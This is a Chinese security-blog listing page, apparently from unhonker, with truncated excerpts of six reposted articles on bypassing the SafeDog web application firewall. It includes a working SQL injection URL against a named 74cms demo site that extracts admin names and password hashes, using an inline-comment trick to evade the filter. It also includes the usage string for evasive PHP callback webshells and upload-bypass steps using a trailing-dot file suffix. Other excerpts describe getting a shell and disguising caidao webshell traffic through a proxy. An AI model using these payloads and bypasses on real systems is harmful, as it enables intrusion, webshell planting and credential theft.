• 实战研究绕过安全狗全过程(时长5小时)

    实战研究绕过安全狗全过程(时长5小时)
    文章转载自90sec 过程:从写漏洞代码 到搭建安全狗 再到 研究安全狗绕过方式 再到用菜刀连接安全狗 1.讲师操作:联合注入绕过安全狗4.0 一条龙 从注入到getshell(成功) 2.讲师操作:联合注入绕过安全狗3.5 (失败) 3.学员操作:安全狗3.5直接getshell(成功) 视频总时长:5小时 日期:2018年9月13号 ——–2.联合注入绕过安全狗4.0一条龙(成功).mp4 ——–3...阅读全文
    作者:unhonker | 分类:技术文章 | 阅读:244次 | 标签:
  • 过狗过盾无特征无动态函数PHP一句话

    过狗过盾无特征无动态函数PHP一句话
    转自90sec@phithon 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(...阅读全文
    作者:unhonker | 分类:技术文章 | 阅读:4,334次 | 标签:
  • 绕过安全狗注入

    绕过安全狗注入
    提交: http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢 然后提交 http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:11,938次 | 标签:
  • [原创首发]绕过最新版网站安全狗3.1 上传

    [原创首发]绕过最新版网站安全狗3.1 上传
    首发自 08安全团队(www.08sec.com) 此方法只试用于 V3.1 06103 (截至发稿前为最新版本) V3.1 05837 或小于V3.1 05837绕过方法请查阅: http://www.08sec.com/thread-2007-1-1.html 我们有专门绕过安全狗的技术小组,最新绕过安全狗系列的方法请关注我们www.08sec.com 测试环境:windows 2003 + iis 6.0 测试步骤: 1.网站安全狗防御状态开启 2.Burp拦截POST包后进行修改 3.是的,你没...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:4,884次 | 标签:
  • [原创首发]绕过网站安全狗3.1 上传

    [原创首发]绕过网站安全狗3.1 上传
    首发自 08安全团队(www.08sec.com) 此方法只试用于V3.1 05837 或小于V3.1 05837 最新版本为 V3.1 06103 ps:此方法已经提交到安全狗安全应急响应中心 绕过网站安全狗 V3.1 06103办法稍后会继续公布出来,请关注我们的消息 www.08sec.com 测试环境:windows 2003 + iis 6.0 测试步骤: 1.确认安全狗功能正常以及版本 2.使用Burp截取上传后进行改包,将后缀改为 08sec.php. 3.审查测试结...阅读全文
    作者:unhonker | 分类:技术文章 | 阅读:5,046次 | 标签:
  • Penetration Test On SafeDog【突破安全狗】

    Penetration Test On SafeDog【突破安全狗】
    0x00 安全狗之菜刀的突破 #原理: BAD: caidao -> safedog -X-> backdoor GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao 菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内 但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去 类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,...阅读全文
    作者:unhonker | 分类:技术文章 | 阅读:6,976次 | 标签:,